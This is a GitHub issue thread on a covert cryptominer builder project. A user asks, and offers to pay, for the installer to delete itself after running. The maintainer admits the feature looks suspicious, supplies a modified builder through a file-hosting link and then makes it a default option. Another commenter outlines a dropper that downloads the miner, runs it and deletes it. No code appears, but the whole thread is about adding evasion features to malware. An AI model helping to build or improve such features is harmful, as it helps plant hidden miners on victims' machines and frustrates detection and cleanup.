### ISSUE TITLE
autodelete

### ISSUE THREAD

**Issue by 1aminov** [UnamSanctam/SilentCryptoMiner#84]
is it possible to automatically delete exe file after installation?

**Comment by UnamSanctam** [comment]
No, I haven't added that since it always looks really suspicious so I don't focus on that feature.

**Comment by 1aminov** [comment]
@UnamSanctam useful feature, but not for everyone, it would be cool if it appeared

**Comment by 1aminov** [comment]
@UnamSanctam hi if i pay to add this feature how much will it cost?

**Comment by 1aminov** [comment]
@UnamSanctam

**Comment by UnamSanctam** [comment]
Well, I won't add it right now but I can just put together a custom builder with that for you after the next release.

**Comment by 1aminov** [comment]
@UnamSanctam thank you very much, I will wait for the update

**Comment by temal32** [comment]
> @UnamSanctam hi if i pay to add this feature how much will it cost?

Hey, I can do this easily for free. You just need to code another program which downloads the miner, runs it and deletes it. (In python and c# its very easy)

**Comment by 1aminov** [comment]
@UnamSanctam hi bro
did you add this feature in the new update?

**Comment by 1aminov** [comment]
@UnamSanctam

**Comment by UnamSanctam** [comment]
No it's not included in the update but it's not that hard to add.

**Comment by 1aminov** [comment]
@UnamSanctam bro, when will you add this feature?  I was hoping it would be in this update

**Comment by UnamSanctam** [comment]
Not sure if I will add it officially but this should do it: https://anonfiles.com/h4se78C6xd/Silent_Crypto_Miner_Builder_zip

**Comment by 1aminov** [comment]
@UnamSanctam Is this feature enabled by default in this builder?

**Comment by UnamSanctam** [comment]
Yes I just directly added the code into it.

**Comment by 1aminov** [comment]
@UnamSanctam Hi, I tried this function, everything works, thank you very much

**Comment by UnamSanctam** [comment]
This option now exists by default in the builder.
